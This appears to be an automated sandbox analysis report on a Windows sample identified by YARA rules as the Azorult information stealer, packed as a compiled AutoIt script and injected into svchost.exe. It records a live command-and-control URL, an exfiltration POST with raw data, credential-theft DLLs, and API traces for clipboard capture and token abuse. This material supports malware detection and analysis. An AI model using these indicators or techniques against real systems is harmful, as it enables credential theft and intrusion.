            Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 32713Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_007FCE44
            Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
            Source: unknownHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26 67 ea 40 70 9d 30 70 9d 37 14 8b 30 61 e8 26 66 9e 26 66 97 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&f
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: cJX8BV8LYG.exe, 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
            Source: svchost.exe, 00000001.00000002.1813419702.0000000003612000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1815335312.0000000005200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.php
            Source: svchost.exe, 00000001.00000002.1815335312.0000000005200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.phpA
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
            Source: cJX8BV8LYG.exe, 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1814289197.000000000365F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1813546210.0000000003631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf8
            Source: svchost.exe, 00000001.00000002.1813546210.0000000003631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: svchost.exe, 00000001.00000002.1814354136.0000000003679000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1814289197.000000000365F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfjfile://192.168.2.1/all/Professional2019Retail.img
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, nssdbm3.dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007FEAFF
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007FED6A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007FEAFF
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_007EAA57
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_00819576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00819576
            Source: Yara matchFile source: Process Memory Space: cJX8BV8LYG.exe PID: 5016, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.svchost.exe.684a82d.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
            Source: 1.2.svchost.exe.68b5f7e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
            Source: 1.2.svchost.exe.6828840.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
            Binary is likely a compiled AutoIt script file
            Source: cJX8BV8LYG.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: cJX8BV8LYG.exe, 00000000.00000000.1640302007.0000000000842000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_44c36978-2
            Source: cJX8BV8LYG.exe, 00000000.00000000.1640302007.0000000000842000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_66f7cd72-5
            Source: cJX8BV8LYG.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fa8d29f7-7
            Source: cJX8BV8LYG.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_213b5097-2
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_007ED5EB
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007E1201
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007EE8F6
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007880600_2_00788060
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F20460_2_007F2046
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E82980_2_007E8298
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007BE4FF0_2_007BE4FF
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B676B0_2_007B676B
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_008148730_2_00814873
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0078CAF00_2_0078CAF0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ACAA00_2_007ACAA0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0079CC390_2_0079CC39
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B6DD90_2_007B6DD9
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0079B1190_2_0079B119
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007891C00_2_007891C0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A13940_2_007A1394
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A17060_2_007A1706
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A781B0_2_007A781B
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0079997D0_2_0079997D
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007879200_2_00787920
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A19B00_2_007A19B0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A7A4A0_2_007A7A4A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A1C770_2_007A1C77
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A7CA70_2_007A7CA7
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B9EEE0_2_007B9EEE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0080BE440_2_0080BE44
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A1F320_2_007A1F32
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E435F00_2_01E435F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00403B98 appears 44 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E64 appears 33 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E3C appears 87 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004062D8 appears 34 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004034E4 appears 36 times
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: String function: 0079F9F2 appears 31 times
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: String function: 007A0A30 appears 46 times
            Source: api-ms-win-core-handle-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-memory-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-utility-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-environment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-process-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l2-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-runtime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-localization-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-time-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-locale-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-stdio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-math-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-private-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-interlocked-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-conio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: cJX8BV8LYG.exe, 00000000.00000003.1705790864.0000000003A83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cJX8BV8LYG.exe
            Source: cJX8BV8LYG.exe, 00000000.00000003.1704442789.0000000003C2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cJX8BV8LYG.exe
            Source: cJX8BV8LYG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
